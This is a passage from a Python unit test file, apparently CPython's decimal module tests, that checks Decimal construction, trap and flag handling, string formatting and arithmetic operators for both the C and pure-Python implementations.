self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
@requires_legacy_unicode_capi
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_from_legacy_strings(self):
import _testcapi
Decimal = self.decimal.Decimal
context = self.decimal.Context()
s = _testcapi.unicode_legacy_string('9.999999')
self.assertEqual(str(Decimal(s)), '9.999999')
self.assertEqual(str(context.create_decimal(s)), '9.999999')
def test_explicit_from_tuples(self):
Decimal = self.decimal.Decimal
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#inf
d = Decimal( (0, (), "F") )
self.assertEqual(str(d), 'Infinity')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, "xyz", 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_list(self):
Decimal = self.decimal.Decimal
d = Decimal([0, [0], 0])
self.assertEqual(str(d), '0')
d = Decimal([1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal([1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25])
self.assertEqual(str(d), '-4.34913534E-17')
d = Decimal((1, [4, 3, 4, 9, 1, 3, 5, 3, 4], -25))
self.assertEqual(str(d), '-4.34913534E-17')
def test_explicit_from_bool(self):
Decimal = self.decimal.Decimal
self.assertIs(bool(Decimal(0)), False)
self.assertIs(bool(Decimal(1)), True)
self.assertEqual(Decimal(False), Decimal(0))
self.assertEqual(Decimal(True), Decimal(1))
def test_explicit_from_Decimal(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
@requires_IEEE_754
def test_explicit_from_float(self):
Decimal = self.decimal.Decimal
r = Decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertTrue(Decimal(float('nan')).is_qnan())
self.assertTrue(Decimal(float('inf')).is_infinite())
self.assertTrue(Decimal(float('-inf')).is_infinite())
self.assertEqual(str(Decimal(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(Decimal(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(Decimal(float('-inf'))),
str(Decimal('-Infinity')))
self.assertEqual(str(Decimal(float('-0.0'))),
str(Decimal('-0')))
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(Decimal(x))) # roundtrip
def test_explicit_context_create_decimal(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
Rounded = self.decimal.Rounded
nc = copy.copy(self.decimal.getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.assertIsInstance(d, Decimal)
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
# more integers
nc.prec = 28
nc.traps[InvalidOperation] = True
for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
2**31-1, 2**31, 2**63-1, 2**63]:
d = nc.create_decimal(v)
self.assertTrue(isinstance(d, Decimal))
self.assertEqual(int(d), v)
nc.prec = 3
nc.traps[Rounded] = True
self.assertRaises(Rounded, nc.create_decimal, 1234)
# from string
nc.prec = 28
self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
self.assertEqual(str(nc.create_decimal('45')), '45')
self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')
# invalid arguments
self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")
# no whitespace and underscore stripping is done with this method
self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")
# too many NaN payload digits
nc.prec = 3
self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
self.assertRaises(InvalidOperation, nc.create_decimal,
Decimal('NaN12345'))
nc.traps[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
nc.flags[InvalidOperation] = False
self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
self.assertTrue(nc.flags[InvalidOperation])
def test_explicit_context_create_from_float(self):
Decimal = self.decimal.Decimal
nc = self.decimal.Context()
r = nc.create_decimal(0.1)
self.assertEqual(type(r), Decimal)
self.assertEqual(str(r), '0.1000000000000000055511151231')
self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
self.assertEqual(str(nc.create_decimal(float('nan'))),
str(nc.create_decimal('NaN')))
self.assertEqual(str(nc.create_decimal(float('inf'))),
str(nc.create_decimal('Infinity')))
self.assertEqual(str(nc.create_decimal(float('-inf'))),
str(nc.create_decimal('-Infinity')))
self.assertEqual(str(nc.create_decimal(float('-0.0'))),
str(nc.create_decimal('-0')))
nc.prec = 100
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip
def test_unicode_digits(self):
Decimal = self.decimal.Decimal
test_values = {
'\uff11': '1',
'\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
'-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
}
for input, expected in test_values.items():
self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
decimal = P
class ImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())
def test_implicit_from_int(self):
Decimal = self.decimal.Decimal
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())
def test_implicit_from_float(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())
def test_implicit_from_Decimal(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
Decimal = self.decimal.Decimal
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('/', '__truediv__', '__rtruediv__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
decimal = P
class FormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
Decimal = self.decimal.Decimal
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.0n', '3.14159265', '3'), # same for 'n'
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# test alignment and padding
('6', '123', ' 123'),
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
('#<10', 'NaN', 'NaN#######'),
('#<10', '-4.3', '-4.3######'),
('#<+10', '0.0130', '+0.0130###'),
('#< 10', '0.0130', ' 0.0130###'),
('@>10', '-Inf', '@-Infinity'),
('#>5', '-Inf', '-Infinity'),
('?^5', '123', '?123?'),
('%^6', '123', '%123%%'),
(' ^6', '-45.6', '-45.6 '),
('/=10', '-45.6', '-/////45.6'),
('/=+10', '45.6', '+/////45.6'),
('/= 10', '45.6', ' /////45.6'),
('\x00=10', '-inf', '-\x00Infinity'),
('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),
# thousands separator
(',', '1234567', '1,234,567'),
(',', '123456', '123,456'),
(',', '12345', '12,345'),
(',', '1234', '1,234'),
(',', '123', '123'),
(',', '12', '12'),
(',', '1', '1'),
(',', '0', '0'),
(',', '-1234567', '-1,234,567'),
(',', '-123456', '-123,456'),
('7,', '123456', '123,456'),
('8,', '123456', ' 123,456'),
('08,', '123456', '0,123,456'), # special case: extra 0 needed
('+08,', '123456', '+123,456'), # but not if there's a sign
(' 08,', '123456', ' 123,456'),
('08,', '-123456', '-123,456'),
('+09,', '123456', '+0,123,456'),
# ... with fractional part...
('07,', '1234.56', '1,234.56'),
('08,', '1234.56', '1,234.56'),
('09,', '1234.56', '01,234.56'),
('010,', '1234.56', '001,234.56'),
('011,', '1234.56', '0,001,234.56'),
('012,', '1234.56', '0,001,234.56'),
('08,.1f', '1234.5', '01,234.5'),
# no thousands separators in fraction part
(',', '1.23456789', '1.23456789'),
(',%', '123.456789', '12,345.6789%'),
(',e', '123456', '1.23456e+5'),
(',E', '123456', '1.23456E+5'),
# issue 6850
('a=-7.0', '0.12345', 'aaaa0.1'),
# issue 22090
('<^+15.20%', 'inf', '<<+Infinity%<<<'),
('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
('=10.10%', 'NaN123', ' NaN123%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
# bytes format argument
self.assertRaises(TypeError, Decimal(1).__format__, b'-020')
def test_n_format(self):
Decimal = self.decimal.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst]) if self.decimal == C else lst
def get_fmt(x, override=None, fmt='n'):
if self.decimal == C:
return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator '
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator '
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
def test_decimal_from_float_argument_type(self):
class A(self.decimal.Decimal):
def __init__(self, a):
self.a_type = type(a)
a = A.from_float(42.5)
self.assertEqual(self.decimal.Decimal, a.a_type)
a = A.from_float(42)
self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
